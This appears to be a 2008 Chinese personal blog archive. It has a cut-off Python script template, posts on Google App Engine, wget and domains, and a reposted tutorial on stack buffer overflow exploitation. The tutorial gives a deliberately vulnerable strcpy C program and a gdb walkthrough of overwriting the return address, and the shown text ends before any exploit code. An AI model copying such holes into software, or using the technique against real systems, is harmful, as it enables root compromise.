#: File LOG format
LOG_FORMAT_FILE = '%(asctime)s %(name)s[%(process)d] %(levelname)10s %(message)s'
#: Levels of logging translation (count of -v, log level)
LOGLEVEL_DICT = { 1 : 50, 2:40, 3:20, 4:10, 5:1 }

DEFAULT_VERBOSITY = 0

def default_action():
    """ Does foo and bar """
    LOG.info("Default action done")

def main():
    """ Main function - parses args and runs action """
    parser = optparse.OptionParser(usage="%prog or type %prog -h (--help) for help", description=__doc__, version="%prog" + __revision__)
    parser.add_option("-v", action="count", dest="verbosity", default = DEFAULT_VERBOSITY, help = "Verbosity. Add more -v to be more verbose (%s) [default: %%default]" % LOG_HELP)
    parser.add_option("-l", "--logfile", dest="logfile",    default = None, help = "Log to file instead off console [default: %default]" )

    (options, args) = parser.parse_args()

    verbosity = LOGLEVEL_DICT.get(int(options.verbosity), DEFAULT_VERBOSITY)

    # Set up logging
    if options.logfile is None:
        logging.basicConfig(level=verbosity, format=LOG_FORMAT_CONS)
    else:
        logfilename = os.path.normpath(options.logfile)
        logging.basicConfig(level=verbosity, format=LOG_FORMAT_FILE, filename=logfilename, filemode='a')
        print >> sys.stderr, "Logging to %s" % logfilename

    # Run actions
    LOG.info("Starting %s, rev %s from %s using verbosity %s/%s as PID %d", __name__, __revision__, os.path.abspath(__file__), options.verbosity, verbosity, os.getpid())

    for action in args:
        if action == 'raise':
            raise Exception("User requested exception")
        else:
            default_action()

    LOG.info("Exited %s, rev %s from %s using verbosity %s/%s as PID %d", __name__, __revision__, os.path.abspath(__file__), options.verbosity, verbosity, os.getpid())

if __name__ == "__main__":
    main()

--
Border
Blog: www.b0rder.cn
Mail: borderj {at} gmail.com

[GAE] Google App Engine 的文档制作为CHM

borderj@gmail.com (Border) — Wed, 23 Apr 2008 02:30:00 +0000

由于近来家里的网络不怎么好, 就把http://code.google.com/appengine/ 网站下的所有文档都下载到本地, 并制作为chm文档, 一般没有网的时候可以看看文档.

整站下载就想到了wget. Wget常用参数:

    ◆-b：后台下载，Wget默认的是把文件下载到当前目录。
    ◆-O：将文件下载到指定的目录中。
    ◆-P：保存文件之前先创建指定名称的目录。
    ◆-t：尝试连接次数，当Wget无法与服务器建立连接时，尝试连接多少次。
    ◆-c：断点续传，如果下载中断，那么连接恢复时会从上次断点开始下载。

通过wget -r -p -np -k http://code.google.com/appengine/ 下载文档

其中:
    -r 参数是指使用递归下载，
    -p 是指下载所有显示完整网页所以需要的文件，如图片等，
    -np 是指不搜索上层目录，-k则是指将绝对链接转换为相对链接。
    -m 要是做镜像可以再加个 -m

--
边江 (Border)
Blog: www.b0rder.cn
Mail: borderj {at} gmail.com

免费注册CN域名

borderj@gmail.com (Border) — Mon, 21 Apr 2008 08:46:00 +0000

免费的CN域名, 刚申请了个b0rder.cn 的,

http://www.net.cn/static/discount/cn20080305.asp

直接访问吧

--
边江 (Border)
Blog: www.borderj.cn
Mail: borderj {at} gmail.com

『 Google 』Google App Engine add domain b0rder.com

borderj@gmail.com (Border) — Sat, 19 Apr 2008 01:20:00 +0000

昨天在name.com申请了两个域名, b0rder.com zhangred.com, 想通过Google App 把域名指向到b0rder.com, 操作了好长时间还是不行, 结果刚刚查了一下, 一般需要48小时, 看来要慢慢等待了.

原文:
Your CNAME record is now configured to point to Google. Keep in mind that changes to your DNS settings may take up to 48 hours to propagate throughout the Internet.

来自: http://www.google.com/support/a/bin/answer.py?answer=47283&ctx=sibling

PS: 一不小心把域名在google app中删了, 要想再加这个域名要等待5天...

--
边江 (Border)
Blog: www.borderj.cn
Mail: borderj {at} gmail.com

『Google 』 App Engine static file bug on windows

borderj@gmail.com (Border) — Fri, 11 Apr 2008 17:50:00 +0000

在App Engine做static file 例子的时候发现在windows中有个Bug, 在Group中发现有人提出了这个问题,
在官方的Issue中也有相应的Bug.

解决方法:

Microsoft Windows XP [版本 5.1.2600]
 Python 2.5.1

here's a good fix for windows user

Windows users can use this workaround:

Change lines 2369-70 in \google\appengine\tools
\dev_appserver.py from:

      regex = os.path.join(re.escape(regex), '(.*)')
       path = os.path.join(path, '\\1')

to:

      regex = re.escape(regex) + '/(.*)'
      path = path + '/\\1'

PS: careful with the indentation.

最后就是注意源码的缩进是2个空格.

--
边江 (Border)
Blog: www.borderj.cn
Mail: borderj {at} gmail.com

『Google 』收到 App Engine 邀请

borderj@gmail.com (Border) — Fri, 11 Apr 2008 13:41:00 +0000

前天Google 刚开放了Google App Engine, 当天就申请了一个, 现在收到邀请, 运气不错.

本来打算要买个支持Python的空间,看来现在可以省几个大洋. 直接在App Engine 上跑个Blog, 说不定再跑个数据挖掘的东东玩玩.

可惜现在每个人只能建三个项目, 目前建了一个Blog, 同时也在Google Code 中建个b0rder项目来管理这个blog的代码, 用来开发这个Blog.

Hello,

Thanks for signing up to try Google App Engine! Your account has been activated, so you can begin building applications!

To start creating applications with Google App Engine, simply follow this link (you may need to sign in with your borderj {@} gmail.com Google Account):

http://appengine.google.com/

Thanks!
The Google App Engine Team

--
边江 (Border)
Blog: www.borderj.cn
Mail: borderj {at} gmail.com

『 Hacking 』如何编写自己的缓冲区溢出利用程序 Linux Buffer Overflow

borderj@gmail.com (Border) — Sat, 05 Apr 2008 17:25:00 +0000

如何编写自己的缓冲区溢出利用程序?
 by 黑猫 (virtualcat@hotmail.com)
 <http://www.xfocus.org>

内容: 本文主要讲解有关Buffer Overflow的原理, 以及结合实战范例介绍Linux和Solaris下的漏洞利用.
 本文并不介绍如何编写shell code.

要求: 读者要有一点C和汇编语言基础.

目标: 希望本文能够尽量做到通熟易懂,使得稍有计算机基础知识的朋友看后能够亲自动手写自己的Exploit
 如果你觉得自己对这些都懂了, 就请不要再往下看了.

 第一部份 概述篇

1. Buffer overflow是如何产生的?
 所谓Buffer overflow, 中文译为缓冲区溢出. 顾名思意, 就是说所用的缓冲区太小了, 以至装不下
 那么多的东西, 多出来的东西跑出来了. 就好象是水缸装不了那么多的水, 硬倒太多会溢出来一样;)
 那么, 在编程过程中为什么要用到buffer(缓冲区)呢? 简单的回答就是做为数据处理的中转站.

2. UNIX下C语言函数调用的机制及缓冲区溢出的利用.
 1) 进程在内存中的影像.
 我们假设现在有一个程序, 它的函数调用顺序如下.
 main(...) -> func_1(...) -> func_2(...) -> func_3(...)
 即: 主函数main调用函数func_1; 函数func_1调用函数func_2; 函数func_2调用函数func_3

 当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.

 (内存高址)
 +--------------------------------------+
 | ...... | ... 省略了一些我们不需要关心的区
 +--------------------------------------+
 | env strings (环境变量字串) | \
 +--------------------------------------+ \
 | argv strings (命令行字串) | \
 +--------------------------------------+ \
 | env pointers (环境变量指针) | SHELL的环境变量和命令行参数保存区
 +--------------------------------------+ /
 | argv pointers (命令行参数指针) | /
 +--------------------------------------+ /
 | argc (命令行参数个数) | /
 +--------------------------------------+
 | main 函数的栈帧 | \
 +--------------------------------------+ \
 | func_1 函数的栈帧 | \
 +--------------------------------------+ \
 | func_2 函数的栈帧 | \
 +--------------------------------------+ \
 | func_3 函数的栈帧 | Stack (栈)
 +......................................+ /
 | | /
 ...... /
 | | /
 +......................................+ /
 | Heap (堆) | /
 +--------------------------------------+
 | Uninitialised (BSS) data | 非初始化数据(BSS)区
 +--------------------------------------+
 | Initialised data | 初始化数据区
 +--------------------------------------+
 | Text | 文本区
 +--------------------------------------+
 (内存低址)

 这里需要说明的是:
 i) 随着函数调用层数的增加, 函数栈帧是一块块地向内存低地址方向延伸的.
 随着进程中函数调用层数的减少, 即各函数调用的返回, 栈帧会一块块地
 被遗弃而向内存的高址方向回缩.
 各函数的栈帧大小随着函数的性质的不同而不等, 由函数的局部变量的数目决定.
 ii) 进程对内存的动态申请是发生在Heap(堆)里的. 也就是说, 随着系统动态分
 配给进程的内存数量的增加, Heap(堆)有可能向高址或低址延伸, 依赖于不
 同CPU的实现. 但一般来说是向内存的高地址方向增长的.
 iii) 在BSS数据或者Stack(栈)的增长耗尽了系统分配给进程的自由内存的情况下,
 进程将会被阻塞, 重新被操作系统用更大的内存模块来调度运行.
 (虽然和exploit没有关系, 但是知道一下还是有好处的)
 iv) 函数的栈帧里包含了函数的参数(至于被调用函数的参数是放在调用函数的栈
 帧还是被调用函数栈帧, 则依赖于不同系统的实现),
 它的局部变量以及恢复调用该函数的函数的栈帧(也就是前一个栈帧)所需要的
 数据, 其中包含了调用函数的下一条执行指令的地址.
 v) 非初始化数据(BSS)区用于存放程序的静态变量, 这部分内存都是被初始化为零的.
 初始化数据区用于存放可执行文件里的初始化数据.
 这两个区统称为数据区.
 vi) Text(文本区)是个只读区, 任何尝试对该区的写操作会导致段违法出错. 文本区
 是被多个运行该可执行文件的进程所共享的. 文本区存放了程序的代码.

 2) 函数的栈帧.
 函数调用时所建立的栈帧包含了下面的信息:
 i) 函数的返回地址. 返回地址是存放在调用函数的栈帧还是被调用函数的栈帧里,
 取决于不同系统的实现.
 ii) 调用函数的栈帧信息, 即栈顶和栈底.
 iii) 为函数的局部变量分配的空间
 iv) 为被调用函数的参数分配的空间--取决于不同系统的实现.

 3) 缓冲区溢出的利用.
 从函数的栈帧结构可以看出:
 由于函数的局部变量的内存分配是发生在栈帧里的, 所以如果我们在某一个函数里定义
 了缓冲区变量, 则这个缓冲区变量所占用的内存空间是在该函数被调用时所建立的栈帧里.

 由于对缓冲区的潜在操作(比如字串的复制)都是从内存低址到高址的, 而内存中所保存
 的函数调用返回地址往往就在该缓冲区的上方(高地址)--这是由于栈的特性决定的, 这
 就为复盖函数的返回地址提供了条件. 当我们有机会用大于目标缓冲区大小的内容来向
 缓冲区进行填充时, 就有可以改写函数保存在函数栈帧中的返回地址, 从而使程序的执
 行流程随着我们的意图而转移. 换句话来说, 进程接受了我们的控制. 我们可以让进程
 改变原来的执行流程, 去执行我们准备好的代码.

 这是冯.诺曼计算机体系结构的缺陷.

 下面是缓冲区溢出利用的示意图:
 i) 函数对字串缓冲区的操作, 方向一般都是从内存低址向高址的.
 如: strcpy(s, "AAA.....");

 s s+1 s+2 s+3 ...
 +---+---+---+--------+---+...+
 (内存低址) | A | A | A | ...... | A |...| (内存高址)
 +---+---+---+--------+---+...+

 ii) 函数返回地址的复盖

 / | ...... | (内存高址)
 / +--------------------+
 调用函数栈帧 | 0x41414141 |
 \ +--------------------+
 \ | 0x41414141 | 调用函数的返回地址
 \+--------------------+
 /| ...... |
 / +--------------------+ s+8
 / | 0x41414141 |
 / +--------------------+ s+4
 被调用函数栈帧 | 0x41414141 |
 \ +--------------------+ s
 \ | 0x41414141 |
 \ +--------------------+
 \| ...... |
 +....................+
 | ...... | (内存低址)

 注: 字符A的十六进制ASCII码值为0x41.

 iii) 从上图可以看出: 如果我们用的是进程可以访问的某个地址而不是0x41414141
 来改写调用函数的返回地址, 而这个地址正好是我们准备好的代码的入口, 那么
 进程将会执行我们的代码. 否则, 如果用的是进程无法访问的段的地址, 将会导
 致进程崩馈--Segment Fault Core dumped (段出错内核转储); 如果该地址处有
 无效的机器指令数据, 将会导致非法指令(Illigal Instruction)错误, 等等.

 4) 缓冲区在Heap(堆)区或BBS区的情况
 i) 如果缓冲区的内存空间是在函数里通过动态申请得到的(如: 用malloc()函数申请), 那
 么在函数的栈帧中只是分配了存放指向Heap(堆)中相应申请到的内存空间的指针. 这种
 情况下, 溢出是发生在(Heap)堆中的, 想要复盖相应的函数返回地址, 看来几乎是不可
 能的. 这种情况的利用可能性要看具体情形, 但不是不可能的.
 ii) 如果缓冲区在函数中定义为静态(static), 则缓冲区内存空间的位置在非初始化(BBS)区,
 和在Heap(堆)中的情况差不多, 利用是可能的. 但还有一种特姝情况, 就是可以利用它来
 复盖函数指针, 让进程后来调用相应的函数变成调用我们所指定的代码.

3. 从缓冲区溢出的利用可以得到什么?
 从上文我们看到, 缓冲区溢出的利用可以使我们能够改写相关内存的内容及函数的返回地址, 从而
 改变代码的执行流程, 让进程去执行我们准备好的代码.

 但是, 进程是以我们当前登录的用户身份来运行的. 能够执行我们准备好的代码又怎样呢? 我们还
 是无法突破系统对当前用户的权限设置, 无法干超越权限的事.

 换句话来说, 要想利用缓冲区溢出得到更高的权限, 我们还得利用系统的一些特性.

 对于UNIX来讲, 有两个特性可以利用.
 i) SUID及SGID程序
 UNIX是允许其他用户可以以某个可执行文件的文件拥有者的用户ID或用户组ID的身份来执行该
 文件的,这是通过设置该可执行文件的文件属性为SUID或SGID来实现的.
 也就是说如果某个可执行文件被设了SUID或SGID, 那么当系统中其他用户执行该文件时就相当
 于以该文件属主的用户或用户组身份来执行该文件.
 如果某个可执行文件的属主是root, 而这个文件被设了SUID, 那么如果该可执行文件存在可利
 用的缓冲区溢出漏洞, 我们就可以利用它来以root的身份执行我们准备好的代码. 没有比让它
 为我们产生一个具有超级用户root身份的SHELL更吸引人了, 是不是?

 ii) 各种端口守护(服务)进程
 UNIX中有不少守护(服务)进程是以root的身份运行的, 如果这些程序存在可利用的缓冲区溢出,
 那么我们就可以让它们以当前运行的用户身份--root去执行我们准备被好的代码.
 由于守护进程已经以root的身份在运行, 我们并不需要相对应的可执行文件为SUID或SGID属性.
 又由于此类利用通常是从远程机器上向目标机器上的端口发送有恶意的数据造成的, 所以叫做
 "远程溢出"利用.

4. 一个有问题的程序
 以下例程纯属虚构, 如有雷同, 纯属巧合.

/*
* 文件名 : p.c
* 编译 : gcc -o p p.c
*/

#include

void vulFunc(char* s)
{
 char buf[10];
 strcpy(buf, s);
 printf("String=%s\n", buf);
}

main(int argc, char* argv[])
{
 if(argc == 2)
 {
 vulFunc(argv[1]);
 }
 else
 {
 printf("Usage: %s \n", argv[0]);
 }

}

 这个例程接受用户在命令行的字串输入, 然后在标准输出(屏幕)上打印出来. 我们可以看出在
 vulFunc()这个函数里, 定义了一个最多可以装十个字符的缓冲区buf. 如果我们在命令行输入
 小于等于十个字符的字串, 则一切都很正常. 但是, 如果我们输入的字串长度大于十呢? 情况
 会怎样? 缓冲区太小装不下了, 所以溢出了? 答案有待于具体分析一下才知道.

 对于这个程序在不同操作系统下的分析和模拟攻击. 请看第二部份基楚篇

 第二部份 基楚篇
5. Linux x86 平台
 本文使用了如下Linux平台:
 Red Hat Linux release 6.2 (Zoot)
 Kernel 2.2.14-12 on an i586

 所使用的编译器及版本:
 bash$ gcc -v
 Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs
 gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)

 注意: 不同版本的编译器编译相同代码所生成的机器指令可能不同.

 1) 例程p.c在Linux x86平台下的剖析.
 i) 首先我们编译p.c并用gdb对相关函数进行反汇编
 结果见如下清单:

 bash$ gcc -o p p.c
 bash$ gdb p
 GNU gdb 19991004
 Copyright 1998 Free Software Foundation, Inc.
 GDB is free software, covered by the GNU General Public License, and you are
 welcome to change it and/or distribute copies of it under certain conditions.
 Type "show copying" to see the conditions.
 There is absolutely no warranty for GDB. Type "show warranty" for details.
 This GDB was configured as "i386-redhat-linux"...
 (gdb) disas main
 Dump of assembler code for function main:
 0x804842c

: push %ebp ; esp的值等于esp-4(因为ebp是32位);
 ; 把ebp的值放入esp所指的32位内存单
 ; 元(注: 这里保存栈底).
 0x804842d : mov %esp,%ebp ; ebp的值等于esp的值(注: 这里把原来
 ; 的栈顶做为新的栈底).

 运行这两条指令, 然后看一下寄存器内容和栈的情况.
 (gdb) si
 0x804842d in main ()
 (gdb) si
 0x804842f in main ()
 (gdb) i reg
 eax 0x4010b3f8 1074836472
 ecx 0x804842c 134513708
 edx 0x4010d098 1074843800
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6b8 -1073744200
 ebp 0xbffff6b8 -1073744200
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x804842f 134513711
 eflags 0x346 838
 cs 0x23 35
 ss 0x2b 43
 ds 0x2b 43
 es 0x2b 43
 fs 0x0 0
 gs 0x0 0
 cwd 0xffff037f -64641
 swd 0xffff0000 -65536
 twd 0xffffffff -1
 fip 0x40034d70 1073958256
 fcs 0x35d0023 56426531
 fopo 0xbfffe400 -1073748992
 fos 0xffff002b -65493
 (gdb) x/9x $esp
 0xbffff6b8: 0xbffff6d8 0x400349cb 0x00000002 0xbffff704
 0xbffff6c8: 0xbffff710 0x40013868 0x00000002 0x08048350
 0xbffff6d8: 0x00000000

 此时进程的相关影像为:
 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704|
 +--------+
 |00000002|
 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8|
 0xbffff6b8 +--------+ <-- ebp, esp
 | ...... |
 (内存低址)

 接下来的两条指令:
 0x804842f : cmpl $0x2,0x8(%ebp) ; 2和ebp+8所指向的内存(32位--4
 ; 个字节)里面所放的内容比较.
 0x8048433 : jne 0x8048448 ; 如果不等则跳到0x08048448地址
 ; 处继续执行, 否则执行下条指令.
 这里我们可以看到这是C语言语句
 if(argc == 2)
 {
 ...
 }
 else
 {
 ...
 }
 的等价汇编语句. 内存地址ebp+8处存放的是argc的值.
 (gdb) x/x $ebp+8
 0xbffff6c0: 0x00000002

 我们来看看在调用vulFunc函数前的指令:
 0x8048435 : mov 0xc(%ebp),%eax ; 把内存地址ebp+12处的四个字节的
 ; 内容放到eax里.
 0x8048438 : add $0x4,%eax ; eax等于eax+4.
 0x804843b : mov (%eax),%edx ; 把eax指向的四个内存字节单元里
 ; 的内容赋给edx
 0x804843d : push %edx ; esp等于esp-4, 把edx的值放到esp
 ; 所指的内存地址的四个字节单元里.

 看看ebp+12处放的是什么?
 (gdb) x/x $ebp+12
 0xbffff6c4: 0xbffff704
 怀疑这里放的是指向argv[0]字串的地址的地址, 看看是不是
 (gdb) x/x 0xbffff704
 0xbffff704: 0xbffff83e
 (gdb) x/1s 0xbffff83e
 0xbffff83e: "/home/vcat/p"
 果然是. 那么$ebp+12的所指的四个字节的内容(argv[0]字串的地址)加上四, 应该就是指向
 argv[1]字串的地址了.
 (gdb) x/x 0xbffff704+4
 0xbffff708: 0xbffff856
 (gdb) x/1s 0xbffff856
 0xbffff856: "AAAAAAAA"

 可以看出, 这四条指令是用来计算argv[1](即所输入的字串"AAAAAAAA"在内存中的起始地址),
 然后把该地址压入栈中做为参数传给即将被调用的函数vulFunc的.

 设个断点在0x804843e, 让程序继续执行到调用vulFunc函数之前.
 (gdb) b *0x804843e
 Breakpoint 2 at 0x804843e
 (gdb) c
 Continuing.

 (gdb) i reg
 eax 0xbffff708 -1073744120
 ecx 0x804842c 134513708
 edx 0xbffff856 -1073743786
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6b4 -1073744204
 ebp 0xbffff6b8 -1073744200
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x804843e 134513726
 eflags 0x282 642
 (以下省略)
 ...

 (gdb) x/10x $esp
 0xbffff6b4: 0xbffff856 0xbffff6d8 0x400349cb 0x00000002
 0xbffff6c4: 0xbffff704 0xbffff710 0x40013868 0x00000002
 0xbffff6d4: 0x08048350 0x00000000

 此时的进程在内存中的相关影像为:
 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的开始地址
 0xbffff6b4 +--------+ <-- main函数的esp
 | ...... |
 (内存低址)

 单步执行
 (gdb) si
 0x8048400 in vulFunc ()

 好, 现在进入vulFunc函数了.
 (gdb) i reg
 eax 0xbffff708 -1073744120
 ecx 0x804842c 134513708
 edx 0xbffff856 -1073743786
 ebx 0x4010c1ec 1074840044
 esp 0xbffff6b0 -1073744208
 ebp 0xbffff6b8 -1073744200
 esi 0x4000ae60 1073786464
 edi 0xbffff704 -1073744124
 eip 0x8048400 134513664
 eflags 0x382 898
 (以下省略)
 ...

 这时esp已经变为0xbffff6b0, 和以前的值0xbffff6b4比较相差四个字节.
 我们来看看到底压了什么东西入栈.
 (gdb) x/11x $esp
 0xbffff6b0: 0x08048443 0xbffff856 0xbffff6d8 0x400349cb
 0xbffff6c0: 0x00000002 0xbffff704 0xbffff710 0x40013868
 0xbffff6d0: 0x00000002 0x08048350 0x00000000

 原来是main函数里调用vulFunc函数的指令的后续指令的地址--即vulFunc函数的返回地址.
 这是我们的第一个焦点.

 ...
 0x804843e : call 0x8048400
 0x8048443 : add $0x4,%esp
 ...

 我们接着分析vulFunc函数.
 0x8048400 : push %ebp
 0x8048401 : mov %esp,%ebp
 0x8048403 : sub $0xc,%esp ; esp等于esp-12, 栈帧大小增加12个字节.

 前面两条指令的功能和main函数的一样, 用来保存调用函数栈帧的栈底ebp和设置被调用函
 数栈帧栈底.
 即: 保存调用函数的栈帧栈底, 调用函数栈帧的栈顶变为被调用函数的栈底. 可以看出当前
 (被调用函数)的栈帧为空时, ebp和esp的值相等.

 第三条指令在栈帧中分配了0xc(十二)个字节的内存空间, 注意到里面的内容是垃圾.
 (gdb) si
 0x8048401 in vulFunc ()
 (gdb) si
 0x8048403 in vulFunc ()
 (gdb) si
 0x8048406 in vulFunc ()

 (gdb) x/15x $esp
 0xbffff6a0: 0x4000ae60 0xbffff704 0xbffff6b8 0xbffff6b8
 0xbffff6b0: 0x08048443 0xbffff856 0xbffff6d8 0x400349cb
 0xbffff6c0: 0x00000002 0xbffff704 0xbffff710 0x40013868
 0xbffff6d0: 0x00000002 0x08048350 0x00000000

 此时进程在内存中相关的影像为:
 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+
 |08048443| vulFunc函数的返回地址
 0xbffff6b0 +--------+ <-- 调用vulFunc函数前的esp
 |bffff6b8| main函数的ebp
 0xbffff6ac +--------+ <-- vulFunc函数的ebp
 |bffff6b8| (垃圾)
 0xbffff6a8 +--------+
 |bffff704| (垃圾)
 0xbffff6a4 +--------+
 |4000ae60| (垃圾)
 0xbffff6a0 +--------+ <-- vulFunc的当前esp
 | ...... |
 (内存低址)

 再看看下面的四条指令.
 0x8048406 : mov 0x8(%ebp),%eax ; 把ebp+8指向的内存单元(4字节)里
 ; 的内容赋给eax.
 从上图看出vulFunc函数栈帧的ebp+8四字节内存单元里放的是指向"AAAAAAAA"字符串的起始地址.

 0x8048409 : push %eax ; eax的值入栈.
 把指向"AAAAAAAA"字符串的起始地址入栈.

 0x804840a : lea 0xfffffff4(%ebp),%eax
 哇! 好吓人呀! 这条指令是干什么的? 让我们慢慢来分析一下.
 这条指令是把ebp+0xfffffff4做为地址值赋给eax.
 但是ebp的值加上0xfffffff4指向那里呀, 这是我们要弄清楚的.
 这里如果我们按正数来加, 那是不行的.
 实际上这个十六进制的0xfffffff4所表示的是负数, 要知道它的值, 让我们来算一下.

 F F F F F F F 4
 +----+----+----+----+----+----+----+----+
 |1111|1111|1111|1111|1111|1111|1111|0100|
 +----+----+----+----+----+----+----+----+

 取反

 0 0 0 0 0 0 0 B
 +----+----+----+----+----+----+----+----+
 |0000|0000|0000|0000|0000|0000|0000|1011|
 +----+----+----+----+----+----+----+----+

 加一

 0 0 0 0 0 0 0 C
 +----+----+----+----+----+----+----+----+
 |0000|0000|0000|0000|0000|0000|0000|1100|
 +----+----+----+----+----+----+----+----+

 也就是负的0xc. ebp+0xfffffff4, 即ebp-0xc.

 所以ebp+0xfffffff4, 就是现在栈顶指向的那十二个字节的起始地址.

 0x804840d : push %eax
 接着把得到的地址入栈.

 让程序运行到调用strcpy函数之前看看
 (gdb) b *0x804840e
 Breakpoint 3 at 0x804840e
 (gdb) c
 Continuing.

 Breakpoint 3, 0x804840e in vulFunc ()
 (gdb) x/17x $esp
 0xbffff698: 0xbffff6a0 0xbffff856 0x4000ae60 0xbffff704
 0xbffff6a8: 0xbffff6b8 0xbffff6b8 0x08048443 0xbffff856
 0xbffff6b8: 0xbffff6d8 0x400349cb 0x00000002 0xbffff704
 0xbffff6c8: 0xbffff710 0x40013868 0x00000002 0x08048350
 0xbffff6d8: 0x00000000

 这时进程在内存的相关影像为:
 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+
 |08048443| vulFunc函数的返回地址
 0xbffff6b0 +--------+ <-- 调用vulFunc函数前的esp
 |bffff6b8| main函数的ebp
 0xbffff6ac +--------+ <-- vulFunc函数的ebp
 |bffff6b8| (垃圾)
 0xbffff6a8 +--------+
 |bffff704| (垃圾)
 0xbffff6a4 +--------+
 |4000ae60| (垃圾)
 0xbffff6a0 +--------+
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff69c +--------+
 |bffff6a0| vulFunc函数栈帧中分配的十二个字节起始地址
 0xbffff698 +--------+ <-- vulFunc的当前esp
 | ...... |
 (内存低址)

 我们这里不关心strcpy函数具体运行, 把断点设到调用它的后续指令.
 (gdb) b *0x8048413
 Breakpoint 4 at 0x8048413
 (gdb) c
 Continuing.

 Breakpoint 4, 0x8048413 in vulFunc ()
 (gdb) x/17x $esp
 0xbffff698: 0xbffff6a0 0xbffff856 0x41414141 0x41414141
 0xbffff6a8: 0xbffff600 0xbffff6b8 0x08048443 0xbffff856
 0xbffff6b8: 0xbffff6d8 0x400349cb 0x00000002 0xbffff704
 0xbffff6c8: 0xbffff710 0x40013868 0x00000002 0x08048350
 0xbffff6d8: 0x00000000

 这时进程在内存中的相关影像为:
 (内存高址)
 | ...... |
 +--------+
 |00000000|
 0xbffff6d8 +--------+ <-- 调用main函数前的ebp
 |08048350|
 +--------+
 |00000002|
 +--------+
 |40013868|
 +--------+
 |bffff710|
 +--------+
 |bffff704| argv的地址(即argv[0]的地址)
 0xbffff6c4 +--------+
 |00000002| argc的值
 0xbffff6c0 +--------+
 |400349cb|
 0xbffff6bc +--------+ <-- 调用main函数前的esp
 |bffff6d8| 调用main函数前的ebp
 0xbffff6b8 +--------+ <-- main函数的ebp
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff6b4 +--------+
 |08048443| vulFunc函数的返回地址
 0xbffff6b0 +--------+ <-- 调用vulFunc函数前的esp
 |bffff6b8| main函数的ebp
 0xbffff6ac +--------+ <-- vulFunc函数的ebp
 |bffff600|
 0xbffff6a8 +--------+
 |41414141|
 0xbffff6a4 +--------+
 |41414141|
 0xbffff6a0 +--------+
 |bffff856| 字符串"AAAAAAAA"在内存中的起始地址
 0xbffff69c +--------+
 |bffff6a0| vulFunc函数栈帧中分配的十二个字节起始地址
 0xbffff698 +--------+ <-- vulFunc的当前esp
 | ...... |
 (内存低址)

 我们注意到在vulFunc函数栈帧中所分配的那十二个字节, 从传递给strcpy函数的起始
 地址处被我们所输入的八个'A'(十六进制0x41)填充了.

 这是我们的第二个焦点.

 同时也注意到, 内存地址0xbffff6a8所指向的四个字节的内容由原来的垃圾数据0xbffff6b8
 变成了bffff600.

 低字节的00应该就是字符串"AAAAAAAA"的零结尾字节.

 所以得出结论: vulFunc函数栈帧中分配的那十二个字节是给局部变量buf(缓冲区)的.
 这里会奇怪: 程序中buf缓冲区只定义了十个字节的大小, 为什么为它分配了十二个字
 节? 原因是: 内存的分配是以四字节为单位的.所以十个字节(4+4+2)要用三个内存分
 配单元, 3*4=12.

 如果我们在命令行提供的字串长度为十(多两个字符, 刚好是程序中定义的缓冲区的大
 小), 那么内存地址0xbffff6a8所指向的四个字节的内容将是bf004141; 如果增加到十
 一个, 内存地址0xbffff6a8所指向的四个字节的内容为00414141, 刚好填满栈帧中分配
 给buf的内存空间. 可以看出, 在命令行中提供的字串长度小于12, 程序是不会出错的.

 现在让我们看看字串长度等于十二的情况, 这时0xbffff6a8所指向的四个字节的内存单
 元已被41414141填满.0xbffff6ac所指向的四个字节的内存单元的低字节被00所填, 其内
 容变为bffff600, 从上面的影像图可知: 这个内存单元里保存的是调用函数的ebp. 也就
 是说, 当字串长度大于或等于十二时, 调用函数的ebp被复盖.

 从进程的影像图可以看出, 要想全面复盖vulFunc函数的返回地址, 则字节串的长度至少
 要二十(12+8)个字节.

 我们继续分析后面的指令:
 0x8048413 : add $0x8,%esp ; 栈帧缩小8个字节--放弃了两个内存存储单元.

 可以看到, 在调用strcpy前, 依次压了s和buf的地址入栈, 现在这条指令是把这两个地址抛弃.

